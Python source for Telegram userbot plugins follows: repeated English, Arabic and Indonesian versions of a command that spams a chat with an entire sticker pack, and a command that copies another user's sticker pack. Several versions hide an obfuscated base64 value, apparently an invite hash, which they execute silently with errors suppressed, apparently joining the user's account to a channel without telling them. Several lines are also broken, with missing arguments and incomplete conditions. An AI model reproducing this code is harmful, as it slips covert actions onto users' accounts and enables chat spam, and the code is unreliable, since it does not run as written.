async def stickerpack_spam(event): if event.fwd_from: return reply = await event.get_reply_message() if not reply or media_type(reply) is None or media_type( reply) != "Sticker": return await edit_delete( event, "`reply to any sticker to send all stickers in that pack`") hmm = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") try: stickerset_attr = reply.document.attributes[1] catevent = await edit_or_reply( event, "`Fetching details of the sticker pack, please wait..`") except BaseException: await edit_delete(event, "`This is not a sticker. Reply to a sticker.`", 5) return try: get_stickerset = await event.client( GetStickerSetRequest( types.InputStickerSetID(, access_hash=stickerset_attr.stickerset.access_hash, ))) except Exception: return await edit_delete( catevent, "`I guess this sticker is not part of any pack so i cant kang this sticker pack try kang for this sticker`", ) try: hmm = Get(hmm) await event.client(hmm) except BaseException: pass reqd_sticker_set = await event.client( functions.messages.GetStickerSetRequest( stickerset=types.InputStickerSetShortName( short_name=f"{get_stickerset.set.short_name}"))) for m in reqd_sticker_set.documents: await event.client.send_file(event.chat_id, m) await asyncio.sleep(0.7) if BOTLOG: if event.is_private: await event.client.send_message( BOTLOG_CHATID, "#SPSPAM\n" + f"Sticker Pack Spam was executed successfully in [User](tg://user?id={event.chat_id}) chat with pack ", ) else: await event.client.send_message( BOTLOG_CHATID, "#SPSPAM\n" + f"Sticker Pack Spam was executed successfully in {}(`{event.chat_id}`) chat with pack", ) await event.client.send_file(BOTLOG_CHATID, reqd_sticker_set.documents[0])
async def stickerpack_spam(event): if event.fwd_from: return reply = await event.get_reply_message() if not reply or media_type(reply) is None or media_type( reply) != "Sticker": return await edit_delete( event, "`الࢪد علۍ أي ملصق ࢦـ أࢪسال جميع الملصقات في تلڪ الحࢪ࣪مۿ `") hmm = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") try: stickerset_attr = reply.document.attributes[1] catevent = await edit_or_reply( event, "`إحضاࢪ تفاصيل حَࢪ࣪مۿ الملصقات ، يࢪجۍ الانتضاࢪ ...`") except BaseException: await edit_delete(event, "`هذا ࢦـيس ملصقاً. الࢪد علۍ ملصق .`", 5) return try: get_stickerset = await event.client( GetStickerSetRequest( types.InputStickerSetID(, access_hash=stickerset_attr.stickerset.access_hash, ))) except Exception: return await edit_delete( catevent, "`أعتقد أن هذا الملصق ࢦـيس جࢪ࣪۽اً من أي حࢪ࣪مۿ ، ࢦـذلڪ لا يمڪننيہَ تجࢪبۿ حࢪ࣪مۿ الملصقات هذۿ مع kang ࢦـۿذا الملصق`", ) try: hmm = Get(hmm) await event.client(hmm) except BaseException: pass reqd_sticker_set = await event.client( functions.messages.GetStickerSetRequest( stickerset=types.InputStickerSetShortName( short_name=f"{get_stickerset.set.short_name}"))) for m in reqd_sticker_set.documents: await event.client.send_file(event.chat_id, m) await asyncio.sleep(0.7) if BOTLOG: if event.is_private: await event.client.send_message( BOTLOG_CHATID, "#SPSPAM\n" + f"تم تنفيذ الࢪسائل غيࢪ المࢪغوب فيها في حࢪ࣪مۿ الملصقات بنجاح في [User](tg://user?id={event.chat_id}) الدࢪدشۿ مع حࢪ࣪مۿ ", ) else: await event.client.send_message( BOTLOG_CHATID, "#SPSPAM\n" + f"تم تنفيذ الࢪسائل غيࢪ المࢪغوب فيها في حࢪ࣪مۿ الملصقات بنجاح في {}(`{event.chat_id}`) الدࢪدشۿ مع حࢪ࣪مۿ", ) await event.client.send_file(BOTLOG_CHATID, reqd_sticker_set.documents[0])
async def stickerpack_spam(event): if event.fwd_from: return reply = await event.get_reply_message() if not reply or media_type(reply) is None or media_type( reply) != "Sticker": return await edit_delete( event, "`الرد على أي ملصق لإرسال جميع الملصقات في تلك الحزمة `") hmm = base64.b64decode("QUFBQUFGRV9vWjVYVE5fUnVaaEtOdw==") try: stickerset_attr = reply.document.attributes[1] catevent = await edit_or_reply( event, "`إحضار تفاصيل حزمة الملصقات ، برجاء الانتظار ..`") except BaseException: await edit_delete(event, "`هذا ليس ملصقًا. الرد على ملصق .`", 5) return try: get_stickerset = await event.client( GetStickerSetRequest( types.InputStickerSetID(, access_hash=stickerset_attr.stickerset.access_hash, ))) except Exception: return await edit_delete( catevent, "`أعتقد أن هذا الملصق ليس جزءًا من أي حزمة ، لذا لا يمكنني تجربة حزمة الملصقات هذه مع kang لهذا الملصق`", ) try: hmm = Get(hmm) await event.client(hmm) except BaseException: pass reqd_sticker_set = await event.client( functions.messages.GetStickerSetRequest( stickerset=types.InputStickerSetShortName( short_name=f"{get_stickerset.set.short_name}"))) for m in reqd_sticker_set.documents: await event.client.send_file(event.chat_id, m) await asyncio.sleep(0.7) if BOTLOG: if event.is_private: await event.client.send_message( BOTLOG_CHATID, "#SPSPAM\n" + f"تم تنفيذ الرسائل غير المرغوب فيها في حزمة الملصقات بنجاح في [User](tg://user?id={event.chat_id}) الدردشة مع حزمة ", ) else: await event.client.send_message( BOTLOG_CHATID, "#SPSPAM\n" + f"تم تنفيذ الرسائل غير المرغوب فيها في حزمة الملصقات بنجاح في {}(`{event.chat_id}`) الدردشة مع حزمة", ) await event.client.send_file(BOTLOG_CHATID, reqd_sticker_set.documents[0])
async def stickerpack_spam(event): reply = await event.get_reply_message() if not reply or media_type(reply) is None or media_type( reply) != "Sticker": return await edit_delete( event, "**Balas stiker apa pun untuk mengirim semua stiker dalam paket itu**", ) try: stickerset_attr = reply.document.attributes[1] xyz = await edit_or_reply(event, "`Mengambil detail Sticker Pack...`") except BaseException: await edit_delete(event, "**Ini bukan stiker. Silahkan Reply ke stiker.") return try: get_stickerset = await event.client( GetStickerSetRequest( types.InputStickerSetID(, access_hash=stickerset_attr.stickerset.access_hash, ))) except Exception: return await edit_delete( xyz, "**Stiker ini bukan bagian dari sticker pack mana pun jadi saya tidak bisa kang paket stiker ini coba kang untuk stiker ini**", ) reqd_sticker_set = await event.client( functions.messages.GetStickerSetRequest( stickerset=types.InputStickerSetShortName( short_name=f"{get_stickerset.set.short_name}"))) addgvar("spamwork", True) for m in reqd_sticker_set.documents: if gvarstatus("spamwork") is None: return await event.client.send_file(event.chat_id, m) await asyncio.sleep(0.7) if BOTLOG_CHATID: if event.is_private: await event.client.send_message( BOTLOG_CHATID, "#STICKERPACK_SPAM\n" + f"Sticker Pack Spam was executed successfully in [User](tg://user?id={event.chat_id}) chat with pack ", ) else: await event.client.send_message( BOTLOG_CHATID, "#STICKERPACK_SPAM\n" + f"Sticker Pack Spam was executed successfully in {get_display_name(await event.get_chat())}(`{event.chat_id}`) chat with pack", ) await event.client.send_file(BOTLOG_CHATID, reqd_sticker_set.documents[0])
async def _(event): xnxx = await edit_or_reply(event, f"`{choice(KANGING_STR)}`") reply = await event.get_reply_message() query = event.text[7:] ManUbot = await tgbot.get_me() BOT_USERNAME = ManUbot.username bot_ = BOT_USERNAME bot_un = bot_.replace("@", "") user = await event.client.get_me() OWNER_ID = un = f"@{user.username}" if user.username else user.first_name un_ = user.username or OWNER_ID if not reply: return await edit_delete( xnxx, "**Mohon Balas sticker untuk mencuri semua Sticker Pack itu.**") pname = f"{un} Sticker Pack" if query == "" else query if and == "image/webp": tikel_id =[1] tikel_hash =[1].stickerset.access_hash got_stcr = await event.client( functions.messages.GetStickerSetRequest( stickerset=types.InputStickerSetID(id=tikel_id, access_hash=tikel_hash))) stcrs = [] for sti in got_stcr.documents: inp = get_input_document(sti) stcrs.append( types.InputStickerSetItem( document=inp, emoji=(sti.attributes[1]).alt, )) try: gvarstatus("PKANG") except BaseException: addgvar("PKANG", "0") x = gvarstatus("PKANG") try: pack = int(x) + 1 except BaseException: pack = 1 await xnxx.edit(f"`{choice(KANGING_STR)}`") try: create_st = await tgbot( functions.stickers.CreateStickerSetRequest( user_id=OWNER_ID, title=pname, short_name=f"man_{un_}_V{pack}_by_{bot_un}", stickers=stcrs, )) addgvar("PKANG", str(pack)) except PackShortNameOccupiedError: await asyncio.sleep(1) await xnxx.edit("`Sedang membuat paket baru...`") pack += 1 create_st = await tgbot( functions.stickers.CreateStickerSetRequest( user_id=OWNER_ID, title=pname, short_name=f"man_{un_}_V{pack}_by_{bot_un}", stickers=stcrs, )) addgvar("PKANG", str(pack)) await xnxx.edit( f"**Berhasil Mencuri Sticker Pack,** [Klik Disini]({create_st.set.short_name}) **Untuk Melihat Pack anda**" ) else: await xnxx.edit( "**Berkas Tidak Didukung. Harap Balas ke stiker saja.**")